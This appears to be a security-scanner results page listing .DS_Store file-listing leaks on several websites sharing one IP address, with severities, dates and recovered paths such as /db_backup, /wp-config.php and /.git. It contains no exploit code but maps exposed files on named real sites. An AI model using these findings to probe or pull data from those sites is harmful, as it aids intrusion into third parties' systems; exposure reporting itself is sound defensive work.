Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a0136d975ed824fa928c94c13628236fd6Found 13 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /css /index.html /indexTR.html /js
Found on 2022-10-26 17:54
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-26 17:54
Last seen 2023-03-23 18:11
Open for 148 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2023-03-23 18:11 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508a301efacc802ee7a49de2f71c61ae5462Found 55 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js
Found on 2023-01-20 19:09 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c114fbe07114fbe07fd7a40859b03158b8a7d289db03aba8fFound 47 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /index.html /indexTR.html /js
Found on 2022-10-26 17:54
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.shidiaktransport.com
Port: 443
URL: https://mail.shidiaktransport.comFirst seen 2022-10-26 17:54
Last seen 2023-03-23 18:11
Open for 148 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c910c508a910c508a301efacc802ee7a49de2f71c61ae5462Found 55 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js
Found on 2023-03-23 18:11 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2a0815492a081549e5e94e039107c95d1c229a934640576dFound 70 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /content/logistics2/images/customs.png /content/logistics2/images/favicon.ico /content/logistics2/images/globe.jpg /content/logistics2/images/home_logistics2_icon1.png /content/logistics2/images/home_logistics2_icon10.jpg /content/logistics2/images/home_logistics2_icon12.jpg /content/logistics2/images/home_logistics2_icon2.png /content/logistics2/images/home_logistics2_icon3.png /content/logistics2/images/home_logistics2_icon4.png /content/logistics2/images/home_logistics2_icon5.png /content/logistics2/images/home_logistics2_icon6.png /content/logistics2/images/home_logistics2_icon7.png /content/logistics2/images/home_logistics2_icon8.png /content/logistics2/images/home_logistics2_pic17.jpg /content/logistics2/images/home_logistics2_pic18.jpg /content/logistics2/images/home_logistics2_pic20.png /content/logistics2/images/home_logistics2_pic21.png /content/logistics2/images/home_logistics2_pic22.png /content/logistics2/images/home_logistics2_pic23.png /content/logistics2/images/home_logistics2_sectionbg2.jpg /content/logistics2/images/home_logistics2_sectionbg4 copy.jpg /content/logistics2/images/home_logistics2_sectionbg4 OLD.jpg /content/logistics2/images/home_logistics2_sectionbg4 PLD.jpg /content/logistics2/images/home_logistics2_sectionbg4.jpg /content/logistics2/images/home_logistics_air.jpg /content/logistics2/images/home_logistics_land.jpg /content/logistics2/images/home_logistics_other.jpg /content/logistics2/images/home_logistics_sea.jpg /content/logistics2/images/logistics2.png /content/logistics2/images/logistics2_hero_bg copy.jpg /content/logistics2/images/logistics2_hero_bg.jpg /content/logistics2/images/packing.jpg /content/logistics2/images/retina-logistics2.png /content/logistics2/images/world.png /css /css/be_style.css /css/custom.css /css/el_demo.css /css/fonts /css/global.css /css/images /css/skins /css/structure.css /index.html /indexTR.html /js /js/animations /js/contact.js /js/el_demo.js /js/email.js /js/flashmediaelement.swf /js/Jplayer.swf /js/jquery-2.1.4.min.js /js/jquery.jplayer.min.js /js/jquery.plugins.js /js/jquery.plugins_new.js /js/mfn.menu.js /js/num.js /js/scripts.js /js/translate3d.js /js/ui
Found on 2023-01-20 19:09 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a0136d975ed824fa928c94c13628236fd6Found 13 files trough .DS_Store spidering: /content /content/logistics2 /content/logistics2/css /content/logistics2/css/custom.css /content/logistics2/css/fonts /content/logistics2/css/images /content/logistics2/css/logistics2.css /content/logistics2/css/structure.css /content/logistics2/images /css /index.html /indexTR.html /js
Found on 2022-10-26 17:54
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-03 17:48
Last seen 2023-03-23 18:09
Open for 201 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2023-03-23 18:09 -
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2023-01-20 19:06 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-03 17:48
Last seen 2023-03-23 18:09
Open for 201 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aa2be5c6ac9bbf5177d3bcbc9ba083170cFound 33 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2023-01-20 19:06 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2022-11-03 18:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cfd.ohc.lwj.mybluehost.me
Port: 80
URL: http://www.cfd.ohc.lwj.mybluehost.meFirst seen 2022-09-03 17:48
Last seen 2023-03-23 18:09
Open for 201 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.crescofamilydentistry.com
Port: 80
URL: http://www.crescofamilydentistry.comFirst seen 2022-09-03 17:48
Last seen 2023-03-23 18:09
Open for 201 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2023-03-23 18:09 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2022-11-03 18:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: mail.crescofamilydentistry.com
Port: 80
URL: http://mail.crescofamilydentistry.comFirst seen 2022-09-03 17:48
Last seen 2023-03-23 18:09
Open for 201 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2022-11-03 18:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:46
Last seen 2023-03-23 17:25
Open for 127 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c63442d9d63442d9d28a25ad628a25ad628a25ad628a25ad6Found 1 files trough .DS_Store spidering: /.git
Found on 2022-11-15 18:46
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 19:34-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 19:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 19:34-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 19:34
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 18:45-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 18:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-20 18:45-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 18:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.theglobeshop.polotska.com
Port: 443
URL: https://www.theglobeshop.polotska.comFirst seen 2023-02-20 18:45-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 18:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.theglobeshop.polotska.com
Port: 80
URL: http://www.theglobeshop.polotska.comFirst seen 2023-02-20 18:45-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2023-02-20 18:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a3ea984250374ee6c088f5e668bf565ae0Found 43 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /uploads/404.jpg /uploads/ads /uploads/country /uploads/default_image /uploads/default_image_flix /uploads/episodes /uploads/genre /uploads/home /uploads/index.html /uploads/landing_page /uploads/no_image.jpg /uploads/player_watermark.jpg /uploads/player_watermark.png /uploads/poster_image /uploads/sliders /uploads/star_image /uploads/subtitles /uploads/system_logo /uploads/temp /uploads/tv_image /uploads/user.jpg /uploads/user_image /uploads/video_thumb /uploads/videos /uploads/watermark_logo.jpg /uploads/watermark_logo.png /web.config
Found on 2022-12-04 18:38 -
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-10-04 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-12-04 18:38 -
Severity: high
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a3ea984250374ee6c088f5e668bf565ae0Found 43 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /uploads/404.jpg /uploads/ads /uploads/country /uploads/default_image /uploads/default_image_flix /uploads/episodes /uploads/genre /uploads/home /uploads/index.html /uploads/landing_page /uploads/no_image.jpg /uploads/player_watermark.jpg /uploads/player_watermark.png /uploads/poster_image /uploads/sliders /uploads/star_image /uploads/subtitles /uploads/system_logo /uploads/temp /uploads/tv_image /uploads/user.jpg /uploads/user_image /uploads/video_thumb /uploads/videos /uploads/watermark_logo.jpg /uploads/watermark_logo.png /web.config
Found on 2022-10-04 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-04 17:48
Last seen 2023-02-03 18:23
Open for 122 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec4ae42b03279222b556b12ab3a697a6c2Found 17 files trough .DS_Store spidering: /application /assets /assets/css /assets/fonts /assets/images /assets/index.html /assets/js /assets/player /assets/plugins /assets/theme /db_backup /index.php /install /sitemap.xml /system /uploads /web.config
Found on 2022-12-04 18:38 -
Severity: high
